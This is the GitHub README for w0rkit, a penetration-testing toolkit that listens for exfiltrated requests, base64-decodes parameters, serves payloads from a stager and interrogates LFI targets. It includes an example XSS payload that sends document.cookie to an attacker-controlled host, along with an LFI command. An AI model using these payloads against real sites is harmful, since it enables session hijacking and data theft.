Skip to content

jarviscodes/w0rkit

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

30 Commits
img
img
 
 
tests
tests
 
 
w0rkit
w0rkit
 
 
.gitignore
.gitignore
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
pyproject.toml
pyproject.toml
 
 

Repository files navigation

w0rkit

A small toolkit containing response handling and parsing solutions that come in handy during PT/BH.

Disclaimer: Pls no evil :(

Installation

  1. git clone ...; cd w0rkit

  2. poetry install

  3. poetry shell

Done :-)

Refactoring Branch

Since most of this tool is being scripted together on the fly, we have a dedicated branch to refactoring. The main branch should contain a working version, but usage, code and some minor features might be different in the unstable refactoring branch.

Usage

A new way of running the tool is introduced in order to make it more extensible. Currently under very active development of LFI mode (unstable, don't expect it to work for your purpose) The web mode is stable and can be used as demonstrated below.

The new modes are web and lfi, where web contains the old stager, and response receiver/decoder.

Web

Currently supports 2 modes. (simple and b64d).

Simple

Just logs request source, headers and parameters. GET only.

w0rkit web simple -l [listen_address] -p [listen_port]

So with -l 127.0.0.1 and -p 80:

$ curl "http://localhost/?query1=foo&query2=bar&something=somethingelse"
OK

Result:

Result

b64d

Fetches a magic_param from the GET query parameters, base64decodes it and removes url encoding.

w0rkit web b64d -l [listen_address] -p [listen_port] -m [magic_param] -m is optional and will default to ?q=

So with -l 127.0.0.1, -p 80 and -m decodeme:

$ curl "http://localhost/?decodeme=JTNDaHRtbCUzRSUwQSUzQ2hlYWQlM0UlMEElM0N0aXRsZSUzRU9oJTIwd293JTJDJTIwc28lMjByZWFkYWJsZSUzQy90aXRsZSUzRSUwQSUzQy9oZWFkJTNFJTBBJTNDYm9keSUzRSUwQSUzQy9ib2R5JTNFJTBBJTNDL2h0bWwlM0U%3D%3D"
OK

Result:

Result

Stager

All Web-apps also have a stager route, in the first merge of the refactoring branch (v0.0.2), the stager directory is configurable with -r. By default it will try to load from /tmp/stager which defaults to C:\tmp\stager on windows. The stager can be used in a lot of different attacks. This is a safer replacement-to-be for always running python3 -m http.server :-)

An Example stored (hardcoded) blind XSS/CSRF attack is currently included in the stager.

Note: Please note that the screenshots might differ from the current options, use --help to see what is available.

When running the code:

// This is just an example payload that you could serve

async function runPayload(){
    let result = await fetch(`http://back-to-our-host.local/?q=${btoa(escape(document.cookie))}`)
}

runPayload()

So by visiting http://localhost/stager/example.html while running in b64d mode with -s (--stager) enabled:

Result:

Result

LFI

Interrogate

Interactive LFI interrogation mode. Facilitates requesting and decoding files after finding a succesful exploitation.

w0rkit lfi interrogate -i "http://vulnerable.target/index.php?filepath=" --filter-mode spf

Useful for

  • Serve Anything, like RFI or DTD Payloads(and exfiltrate easily with b64d in OOB situations)
  • XSS Pivoting
  • Interactive LFI (Soon™ WIP!)

Happy Hunting!

About

No description, website, or topics provided.

Resources

Readme

License

MIT license
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages